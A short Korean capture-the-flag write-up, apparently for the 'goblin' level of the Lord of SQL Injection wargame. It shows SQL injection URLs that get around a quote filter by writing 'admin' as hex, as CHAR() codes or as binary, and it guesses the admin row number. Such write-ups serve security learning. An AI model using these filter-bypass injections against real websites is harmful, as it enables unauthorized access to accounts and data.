LOS-goblin

문제

문제를 보면 싱글쿼트, 더블쿼트를 전부 필터링하고 있다.

 

no=2 or id를 admin으로 해도 문자열을 변수명으로 인식해서 인지 안된다.

그래서 admin을 우회해서 입력을 받아야한다. 

guest 는 no=1로 로그인 가능

그리고 no=1이면 guest로 로그인 되기 때문에 no=1이 아닌 다른 수로 해야 한다. 

 

따라서 admin을 hex값으로 바꾸거나 char함수를 써서 admin을 바꿔줘야한다. 혹은 2진수로 바꿔서 하거나

 

또 다른 방법은 admin의 no를 찾는 방법도 있다. 

 

URL: ?no=2%20or%20id=CHAR(0x61,%200x64,%200x6D,%200x69,%200x6E)

          no=2 or id=0x61646D696E

 

char함수

 

16진수

 

URL: ?no=2%20or%20id=0x61646D696E

          no=2 or id=CHAR(0x61, 0x64, 0x6D, 0x69, 0x6E)

 

2진수

URL: ?no=2%20or%20id=0b0110000101100100011011010110100101101110

         no=2 or id=0b0110000101100100011011010110100101101110

admin의 no.를 찾은 모습

 

admin의 no.를 찾는 방법도있다. guest가 1이라 0아니면 2라고 예상 admin은 no=2다.